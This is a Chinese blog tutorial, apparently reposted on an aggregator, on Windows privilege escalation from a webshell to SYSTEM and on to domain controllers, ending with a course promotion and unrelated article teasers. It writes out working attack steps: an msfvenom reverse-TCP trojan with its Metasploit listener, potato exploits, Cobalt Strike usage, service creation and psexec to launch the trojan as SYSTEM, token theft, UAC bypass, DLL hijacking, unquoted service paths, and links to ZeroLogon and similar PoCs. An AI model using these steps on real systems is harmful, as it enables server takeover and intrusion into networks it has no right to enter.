news 2025/12/25 4:44:15

win权限提升(非常详细)零基础入门到精通,收藏这一篇就够了

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
win权限提升(非常详细)零基础入门到精通,收藏这一篇就够了

**文章目录结构
**

前置知识` `windows权限的划分` `提权的方式``WEB-->操作系统的提权` `内核漏洞提权` `工具提权` `手工提权` `土豆家族``管理员-->操作系统提权` `服务启动提权` `远程控制提权` `进程注入` `令牌窃取` `UAC绕过` `DLL劫持提权` `不安全的服务路径` `不安全的服务权限``域控提权技术

前置知识

windows权限的划分

  • System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。

  • Administrators:管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。

  • Users:普通用户组,这个组的用户无法进行有意或无意的改动。

  • Guests:来宾组,来宾跟普通Users的成员有同等访问权,但来宾帐户的限制更多

  • Everyone:所有的用户,这个计算机上的所有用户都属于这个组。

这几种是比较常见的,还有Power Users:高级用户组等

提权的方式

内核溢出漏洞提权

数据库类型提权

第三方软件应用提权

本篇文章主要是介绍内核溢出漏洞提权以及一些win特性导致的提权,数据库提权的话是一种单独的技术,这和win没有太大的关系,linux上也是一样,之后会单独出一篇关于数据库提权的,第三方软件应用提权主要指的是类似于向日葵等远控软件连接密码的获取会合到数据库提权中。

WEB–>操作系统的提权

内核漏洞提权

市面上作为服务器使用较多的操作系统有Windows Server 2008、2012、2016,我这里折中一下选用2012做****演示,我这里为了贴近真实环境,直接买计时服务器演示,各位下去可以用虚拟机实验。

工具提权

我先演示工具提权,我这里是WEB到操作系统的权限提升

MSF(不推荐)

使用msf生成木马通过webshell上传到对方服务器上

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.141 LPORT=3333 -f exe -o msf.exe

msf配置好监听,然后run,再运行木马程序

use exploit/multi/handler``set payload windows/meterpreter/reverse_tcp``set lhost 0.0.0.0``set lport 3333``exploit

收到回话,然后我们通过msf的漏洞筛选模块,筛选一下可能存在的内核漏洞

use post/multi/recon/local_exploit_suggester``set showdescription true

绿色就代表可能存在,再利用exp提权

use exploit/windows/local/ms16_075_reflection_juicy``set session 1``exploit

这里选择一个经典的烂土豆进行提取

但是看到它这里说成功,但是没有会话产生,看样子是失败了,这种情况下有几种情况我们需要排查一下,可能这个漏洞利用产生的会话需要反弹,我们可以尝试一下(但是它这里不是这个问题,就是利用失败了)。因为我们使用的MSF大多数是免费的公开版,漏洞POC较少,所以不推荐使用,有条件的可以购买pro版本。

CS

cs它自身只有一个提权利用,所以我们主要是使用别人写好的插件里面的提权模块进行提权

在服务器上启动cs

./teamserver IP password

创建监听器并生成木马

还是一样的步骤,上传到对方服务器上执行

成功上线,使用插件进行提权

成功上线

手工提权

工具提权已经介绍完了,工具提权的好处显然易见,简单,方便,傻瓜式操作,但是像MSF免费版poc太少,Pro版本要花钱;CS呢得等别人更新插件,大多数也都是收费的。提权技术是一直在更新的,所以我们需要掌握手工提权技术。

手工提权步骤:

  1. 信息收集:主要是搜集对方服务器上的补丁信息,操作系统等

  2. 补丁筛选:根据对方的操作系统以及补丁情况筛选可能存在的漏洞

  3. EXP获取执行:筛选后寻找对应编号的POC进行提权

第一步_信息收集:在对方服务器上使用Systeminfo命令获取信息

第二步_补丁筛选:这里推荐一个在线网站,一个筛选工具

在线网站:https://i.hacking8.com/tiquan`` ``网站使用:直接复制对方服务器Systeminfo的信息即可

我们就可以根据对方的补丁信息在判断可能存在哪些漏洞,在寻找POC进行利用

利用工具:wesng`` ``项目地址:https://github.com/bitsadmin/wesng`` ``直接敲这条命令筛选`` ``python wes.py systeminfo.txt --color -i "Elevation of Privilege" -o xxx.csv``#systeminfo.txt 复制好的信息``#--color 显示彩色输出``#-i 是筛选漏洞功能``#-o 导出筛选后的内容``更多参数使用各位执行下去查

得到可能存在的漏洞后就进入下一步。

第三步_EXP获取执行:这里推荐几个漏洞POC集合项目

KernelHub 针对常用溢出编号指定找EXP``https://github.com/Ascotbe/Kernelhub`` ``Poc-in-Github 针对年份及编号指定找EXP``https://github.com/nomi-sec/PoC-in-GitHub`` ``exploitdb 针对类型及关键说明指定找EXP``https://gitlab.com/exploit-database/exploitdb

这里有一点要注意,网上公开的exp也是别人写好的,如果使用后没有效果,不一定是服务器上没有这个漏洞,可能是环境的问题,作者在它当时的环境下可能可以成功,所以如果遇到提权失败可以多换几个POC

手工提权大致流程就是这样,但是这个流程比较繁琐,有没有更简单的?必须有,接下来介绍土豆提权,如果一个人不懂土豆提权,那么他win提权就白学了。

土豆家族

介绍:土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。

**土豆提权原理:**土豆系列提权的核心是NTLM中继,通过欺骗运行在高权限(Administrator/SYSTEM)的账户进行ntlm认证,同时作为中间人对认证过程进行劫持和重放,最后调用本地认证接口使用高权限账号的ntml认证获取一个高权限token,只要当前进程拥有SeImpersonatePrivilege权限即可进行令牌模仿,即可取得对应权限。

目前网上的土豆提权系列共有12种,基本覆盖了Windows系统的全系列,我这里挑几个演示。

BadPotato

GodPotato

PrintNotifyPotato

各土豆的利用版本以及下载地址

GodPotato``作用范围:Windows Server 2012 - Windows Server 2022、Windows8 - Windows 11``https://github.com/BeichenDream/GodPotato``SweetPotato``作用范围:从Windows 7到Windows 10 / Server 2019``https://github.com/CCob/SweetPotato``RoguePotato``作用范围:Win 10(部分版本)和Win Server 19``https://github.com/antonioCoco/RoguePotato``BadPotato``作用范围:Windows 2012-2019、Windows 8-10``https://github.com/BeichenDream/BadPotato``EfsPotato``作用范围:未知``https://github.com/zcgonvh/EfsPotato``MultiPotato``作用范围:未知``https://github.com/S3cur3Th1sSh1t/MultiPotato``CandyPotato``作用范围:win10和server2016``https://github.com/klezVirus/CandyPotato``RasmanPotato``作用范围:Windows 10(11 not test), Windows Server 2012 - 2019(2022 not test)``https://github.com/crisprss/RasmanPotato``PetitPotato``作用范围:未知``https://github.com/wh0amitz/PetitPotato``JuicyPotatoNG``作用范围:Windows 10 - 11 Windows Server 2012 - 2022``https://github.com/antonioCoco/JuicyPotatoNG``PrintNotifyPotato``作用范围:Windows 10 - 11 Windows Server 2012 - 2022``https://github.com/BeichenDream/PrintNotifyPotato``CoercedPotato``作用范围:Windows 10 - 11 Windows Server 2012 - 2022``https://github.com/Prepouce/CoercedPotato

管理员–>操作系统提权

服务启动提权

SC

介绍:sc.exe为服务控制管理service control manager,用于对计算机的系统服务进行管理,实现注册,运行,暂停,自启等基础操作,用户能够将符合Windows系统服务化条件的程序进行本地系统后台服务化运行,注册到服务注册表目录下的程序,通过sc的指令实现程序执行状态的切换和管理。

简单来说,添加的服务默认为操作系统权限,我们可以添加服务并把服务指向木马程序

创建一项服务

sc Create syscmd binPath="C:\Users\Administrator\Desktop\httpd-2.4.58-win32-vs17\Apache24\htdocs\caigo8.exe"

开启创建的服务

sc start syscmd

远程控制提权

psexec

介绍:PsExec 是一种轻量级 telnet 替代品,可让你在其他系统上执行进程,并为控制台应用程序提供完整交互性,而无需手动安装客户端软件。PsExec 最强大的用途包括在远程系统上启动交互式命令提示符,以及 IpConfig 等远程启用工具,否则无法显示有关远程系统的信息。

它启动的程序也会以操作系统权限启动,而且这个psexec是微软官方的工具,不存在查杀问题

项目地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

使用``shell psexec.exe -accepteula -s -i -d "C:\Users\Administrator\Desktop\httpd-2.4.58-win32-vs17\Apache24\htdocs\caigo8.exe"

进程注入

介绍:进程注入是一种在某个单独的实时进程的地址空间中执行任意代码的方法。在一个进程的上下文中运行特定代码,则有可能访问该进程的内存,系统或网络资源以及提升权限,这里演示工具使用

MSF

使用ps命令获取当前进程

寻找system权限的,然后最好是x86的

migrate PID

CS

也是一样,先ps获取进程

使用inject PID注入

我这里只演示了提权,进程注入也注低权限用户,也就是降权

令牌窃取

介绍:令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。伪造令牌攻击的核心是 Kerberos 协议。其中注意:令牌窃取并非提权!这里也是演示工具

MSF

use incognito``list_tokens -u``impersonate_token "NT AUTHORITY\SYSTEM"

CS

ps //查看进程``steal_token PID //窃取进程令牌``spawnu PID //窃取进程令牌上线

UAC绕过技术

介绍:用户帐户控制 (UAC) 有助于防止恶意程序(也称为恶意软件)损坏计算机,并帮助组织部署更好的托管桌面。通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。

那么这个东西对于我们提权会有什么影响呢?

对方如果开启了这个,当我们运行一些程序时会出现这个界面

我们实战情况下通常获取到的都是命令行,又没办法在对方服务器上点确定,所以会导致木马或者提权程序运行失败,所以我们需要绕过它

绕过项目:UACME`` ``项目地址:https://github.com/hfiref0x/UACME`` ``使用方式:Akagi64.exe 编号 调用执行``编号推荐 23,61

uac绕过不属于提权技术的一种,只不过当我们在做权限提升的时候可能会遇到这种情况,所以会用到它。

DLL注入

介绍:在Windows系统中,为了节省内存和实现代码重用,微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLL(Dynamic Link Library),即动态链接库,这种库包含了可由多个程序同时使用的代码和数据。

简单来说就是win下的大部分程序在运行时都会加载一些DLL文件,所谓DLL劫持就是替换程序在运行时会加载的DLL文件,让程序加载我们生成的恶意DLL文件达到上线。

注意**:DLL劫持属于被动的权限提权,获取到的权限主要是看程序是由谁运行的。**

DLL劫持利用流程

  1. 寻找受害程序,优先寻找自启动的或者对方可能常用的

  2. 测试程序启动时,会调用的DLL文件并测试能否劫持

  3. 生成同名称的恶意dLL文件,进行替换

  4. 等待服务器程序运行或管理员运行

第一步_寻找受害程序:我这里选用flashfxp

第二步_测试程序运行时加载的DLL文件:我这里使用火绒剑

选中运行程序,查看它调用的DLL文件,这里优先查看软件本身自带的,因为系统中的DLL文件我们是没有权限替换的,如果能替换的话我们也就没有必要提权了,接下来测试DLL能否劫持

使用工具:ChkDllHijack

项目地址:https://github.com/anhkgg/anhkgg-tools

这样就表示可以

输出no就表示不行

第三步_生成恶意DLL文件进行替换:我这里使用CS生成

修改名称替换

第四步_等待服务器重启或者管理员运行

不安全的服务路径

不安全的服务路径是什么呢?,win系统上的服务通常都会对应一个执行程序,列如下图

这个为什么会造成权限提升呢?它这里指向的可执行程序是一个整体所以不会照成安全问题,看下面这个

它指向的执行文件路径是这个

c:\program files (x86)\grasssoft\macro expert\MacroService.exe

它没有使用双引号包裹,说明它不是一个整体,并且它的中间是有空格的

c:\programfiles (x86):这个如果在执行的话会执行c:\programfiles会被当初参数,那么我们就可以生成名为program的木马放到c盘下服务启动时就会执行我们的木马了。

服务检测命令

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

替换完成后使用sc重启服务即可

sc start "服务名"

不安全的服务权限

这个实战碰上的可能性太小了,说白就是你能直接替换服务指向的可执行程序,然后再开启服务,但是假如说我是系统用户权限,除非管理员瞎搞,不然我是不能替换system启动服务的可执行程序的。

检测脚本:accesschk`` ``项目地址:https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk`` ``使用方式:accesschk.exe -uwcqv "" *

普通用户是没有修改指向的权限的,除非对方做了设置

域控提权技术

其实到这里win单机的提权技术就已经介绍完了,但是为了完整性,还是把域控提权加上。由于我机子没有内网环境,所以只是简单提一下,之后更新内网文章的时候会重点讲。

域控提权目前主要的还是使用网上公开的几个CVE漏洞的POC攻击来进行权限提升。

CVE-2014-6324

利用条件:

  1. 需要域用户账号密码

  2. 一台主机的管理员权限

POC地址``WindowsElevation/CVE-2014-6324 at master · Al1ex/WindowsElevation · GitHub⁤

CVE-2021-42287

利用条件:

只需要域用户账号密码

POC地址``https://github.com/WazeHell/sam-the-admin

CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.

poc地址``https://github.com/SecuraBV/CVE-2020-1472

CVE-2022-26923

利用条件:

  1. 一个域内普通账号

  2. 域内存在证书服务器

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2025/12/15 13:44:25

【CSDN博客】创作纪念日 2Y

机缘 今天打开博客,发现有一封周年消息提醒,2周年了,时间过得好快好快... 还记得大学时期,查资料时发现csdn博客的内容很多,当时也只是为了方便查阅,建立了账户。一直到2023 年 12 月 15 日,抽空记录了第 1…

作者头像 李华
网站建设 2025/12/15 13:43:29

终于有人把AIOps说明白了!基于Dify+LLM的ChatOps实战,从0到1一篇搞定!

研究Aiops有一段时间了,目前手里有不少可落地的方案了,接下来会把这些方案全部整理到我的[大模型课程里。同时,欢迎大家把你遇到的场景在评论区留言。我会在能力范围内给你提供思路和建议。 我认为现阶段做Aiops最正确的路径就是去做ChatOps…

作者头像 李华
网站建设 2025/12/22 11:35:22

吉时利2636B 数字源表keithley 2636B

吉时利2636B数字源表keithley 2636B吉时利2636B数字源表是 Keithley 的 60 瓦源表。源表仪器是一种电子测试设备,可测量和记录精确的电压和电流数据。源仪表以高精度收集信息,非常适合电流电压 (IV) 表征、半导体测试以及具有正电流源值和负电流源值的测…

作者头像 李华
网站建设 2025/12/23 9:58:59

如何通过水质监测结果判断排水管网是否存在混接、错接问题?

市政排水管网作为城市水环境治理的“血管系统”,其规范运行直接影响污水处理效率和受纳水体质量。然而,管网混接、错接问题存在——生活污水接入雨水管、工业废水混入雨水管网、雨水管与污水管直接连通等情况,不仅导致污水处理厂进水负荷波动…

作者头像 李华